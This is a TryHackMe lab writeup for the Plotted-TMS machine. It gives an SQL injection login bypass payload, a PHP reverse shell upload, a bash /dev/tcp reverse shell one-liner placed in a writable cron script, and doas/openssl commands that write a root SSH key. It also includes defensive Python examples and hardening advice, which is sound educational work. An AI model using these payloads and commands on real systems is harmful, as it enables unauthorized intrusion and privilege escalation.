Writeup - Plotted-TMS (THM)

This is a writeup for the Plotted-TMS machine from the TryHackMe site.


First, let's start with a scan of our target with the following command:

nmap -sV -T4 -Pn

Three TCP ports are discovered:

  • 22/tcp : SSH port (OpenSSH 8.2)
  • 80/tcp : HTTP web server (Apache 2.4.41)
  • 445/tcp : HTTP web server (Apache 2.4.41)


I start by listing the directories of the site hosted on port 445:

We find a management page that gives us access to an admin login page.

After a few SQL injection attempts I finally manage to log in with the following payload in the username field:

Username = ' or 1=1;-- -

I now have access to the admin panel of the site.

In this panel I find the Settings page, which allows changing the background image of the site's home page. So I try to upload a PHP reverse shell through it.

Then I access it via the following address:

I now have a reverse shell with the user www-data.

After some searching I find that the first flag is in the home directory of the user plot_admin, but I do not have permission to read it. So I need to find a way to switch to that user.

After running linPEAS on the machine I find that a script is run every minute as the user plot_admin.

I don't have permission to modify the script itself, but I do have write permission on the /var/www/scripts folder. So I can replace the current script with a custom one that gives me a reverse shell as plot_admin.

To do this I use the following commands:

mv tmp
echo "bash -c '/bin/bash -i >& /dev/tcp/ 0>&1'" >
chmod +x

I now have a reverse shell with the user plot_admin and I can get the first flag.
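The weakness used here is a cron job whose script sits in a directory that another user can write to: the script itself is read-only, but it can be renamed and replaced. The following Python audit is an added example, not part of the original writeup or of the room; it parses constructed system-crontab lines (the job's script name backup.sh and the two sample jobs are assumed for the example) and flags any job whose script, or the directory holding it, is writable by group or others. It builds its fixture under a temporary directory so it runs offline.

```python
import os
import stat
import tempfile

# Constructed system-crontab lines modelled on the writeup: a job that runs a
# script from /var/www/scripts every minute as plot_admin. The script name
# backup.sh and the second job are assumed for this example.
SAMPLE_CRONTAB = """\
# m h dom mon dow user  command
* * * * * plot_admin /var/www/scripts/backup.sh
0 3 * * * root /usr/local/sbin/rotate-logs
"""


def parse_system_crontab(text):
    """Return (user, script_path) pairs from /etc/crontab-style lines."""
    jobs = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split()
        if len(fields) < 7:  # five time fields, a user and a command
            continue
        jobs.append((fields[5], fields[6]))
    return jobs


def writable_by_others(path):
    """True if the group or world write bit is set on path."""
    return bool(os.stat(path).st_mode & (stat.S_IWGRP | stat.S_IWOTH))


def audit_job(user, script, root="/"):
    """Findings for one job: the script, or the directory holding it, is
    writable by someone other than its owner, so the code that cron runs as
    `user` can be replaced by a different account."""
    path = os.path.join(root, script.lstrip("/"))
    if not os.path.exists(path):
        return ["%s: script missing" % script]
    findings = []
    if writable_by_others(path):
        findings.append("%s: script writable by group/others (runs as %s)"
                        % (script, user))
    parent = os.path.dirname(path)
    parent_mode = os.stat(parent).st_mode
    # A writable directory lets a user rename or replace the script even when
    # the script is read-only, unless the sticky bit limits that to the owner.
    if writable_by_others(parent) and not parent_mode & stat.S_ISVTX:
        findings.append("%s: directory writable by group/others, script can be "
                        "replaced (runs as %s)" % (os.path.dirname(script), user))
    return findings


def audit_crontab(text, root="/"):
    """Map each job's script path to its list of findings."""
    return {script: audit_job(user, script, root)
            for user, script in parse_system_crontab(text)}


def run_demo(scripts_dir_mode):
    """Build the /var/www/scripts layout under a temporary root with the given
    directory mode and return the findings for the plot_admin job."""
    with tempfile.TemporaryDirectory() as root:
        scripts_dir = os.path.join(root, "var/www/scripts")
        os.makedirs(scripts_dir)
        script = os.path.join(scripts_dir, "backup.sh")
        with open(script, "w") as fh:
            fh.write("#!/bin/bash\necho backup\n")
        os.chmod(script, 0o755)            # script itself is not writable by others
        os.chmod(scripts_dir, scripts_dir_mode)
        return audit_crontab(SAMPLE_CRONTAB, root)["/var/www/scripts/backup.sh"]


if __name__ == "__main__":
    print("misconfigured directory (0777):", run_demo(0o777))
    print("hardened directory (0750):     ", run_demo(0o750))
```

Run against the real host, `audit_crontab(open("/etc/crontab").read())` would report the /var/www/scripts case as a directory finding even though the script's own mode looks fine, which is exactly what a permissions check on the file alone misses.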

Privilege escalation

I start by listing the SUID files with the following command:

find / -perm -u=s -type f 2>/dev/null

I find an uncommon binary: doas, an alternative to the sudo command. After some research I find on this site that its configuration file is located at /etc/doas.conf.

It shows that my user can run the openssl command with root privileges. So I look on GTFOBins for known abuses of this command.

GTFOBins shows that openssl can be used to write to files, so I can add my SSH public key to root's authorized_keys file and then connect to the root account over SSH.

To do this I use the following commands:

echo "ssh-rsa [key] kali@kali" | doas openssl enc -out "$FILE"

I now have a root shell and can retrieve the last flag.


To harden this host, I think the following actions would be necessary:

  • Fix the site's code to prevent SQL injection (see OWASP: SQL Injection)
  • Validate image uploads in the admin panel so that files containing code (such as PHP) are rejected
  • Store cron scripts in a folder writable only by their owner
  • Do not grant root privileges (via doas or sudo) to commands that do not require them
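The login bypass earlier in the writeup and the first hardening item above come down to the same defect: the username is concatenated into the SQL text. The following Python example is added here and is not part of the original writeup or of the room's code; it uses an in-memory SQLite table with a constructed user row (the password value is made up) to show that the payload ' or 1=1;-- - logs in against a concatenated query and is simply compared as a string by a parameterized one.

```python
import sqlite3

# Constructed sample row for the admin login table; the password value is
# made up for this example (a real application would store a password hash).
SAMPLE_USERS = [("plot_admin", "not-the-real-password")]

# The payload used in the writeup's login bypass.
PAYLOAD = "' or 1=1;-- -"


def make_db():
    """In-memory SQLite database standing in for the site's user table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_USERS)
    return conn


def login_vulnerable(conn, username, password):
    """Builds the query by string concatenation: user input is parsed as SQL,
    so a quote in the username closes the literal, `or 1=1` makes the WHERE
    clause always true, and `;-- -` comments out the password check."""
    query = ("SELECT username FROM users WHERE username = '" + username
             + "' AND password = '" + password + "'")
    row = conn.execute(query).fetchone()
    return row[0] if row else None


def login_safe(conn, username, password):
    """Uses a parameterized query: the driver binds the values, so the
    payload is compared as a literal username and never interpreted as SQL."""
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


def compare(username, password):
    """Return (vulnerable_result, safe_result) for the same credentials."""
    conn = make_db()
    try:
        return (login_vulnerable(conn, username, password),
                login_safe(conn, username, password))
    finally:
        conn.close()


if __name__ == "__main__":
    print("payload, concatenated vs parameterized:", compare(PAYLOAD, "anything"))
    print("valid credentials:", compare("plot_admin", "not-the-real-password"))
    print("wrong password:", compare("plot_admin", "wrong"))
```

The same fix applies to the PHP site in the room: PDO or mysqli prepared statements with bound parameters, with the SQL text kept free of user input.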